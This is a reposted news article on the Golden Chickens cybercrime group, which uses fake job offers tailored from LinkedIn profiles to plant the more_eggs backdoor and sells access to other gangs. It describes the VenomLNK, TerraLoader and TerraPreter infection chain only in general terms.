Top cybercrime gangs use targeted fake job offers to deploy stealthy backdoor | #firefox | #firefoxsecurity


A group of criminals behind a stealthy backdoor known as more_eggs is targeting professionals with fake job offers tailored to them based on information from their LinkedIn profiles. The gang is selling access to systems infected with the backdoor to other sophisticated cybercrime groups including FIN6, Evilnum and Cobalt Group that are known to target organizations from various industries.

Spearfishing with LinkedIn info

In a recent attack detected by researchers from managed detection and response firm eSentire, the hackers targeted a professional working in the healthcare technology industry with a phishing email mimicking a job offer for a position identical to the one the target had listed on their LinkedIn profile page. This seems to be a technique that this group, known in the security industry as the Golden Chickens, has also used in the past.

The rogue emails contain a zip file that’s named after the job position the email offers. If opened, it starts a malicious component known as VenomLNK, which serves as the first stage in the more_eggs infection.

“Golden Chickens sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cybercriminals,” the eSentire’s research team said in its report. “Once more_eggs is on the victim’s computer system, the Golden Eggs seedy customers can go in and infect the system with any type of malware: ransomware, credential stealers, banking malware, or simply use the backdoor as a foothold into the victim’s network so as to exfiltrate data.”

The infection chain

Once executed on a victim’s machine, VenomLNK uses Windows Management Instrumentation (WMI), a subsystem of PowerShell, to deploy that attack’s second stage: a malware loader known as TerraLoader.

TerraLoader hijacks two legitimate Windows processes, cmstp and regsvr32, to load the final payload called TerraPreter, which gets downloaded from servers hosted on Amazon AWS to evade possible network filters and gets deployed as an ActiveX control. ActiveX is a framework that allows code execution through Internet Explorer and is supported natively on Windows.

Copyright © 2021 IDG Communications, Inc.



Original Source link

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Leave a Reply

Your email address will not be published. Required fields are marked *

90 − = 89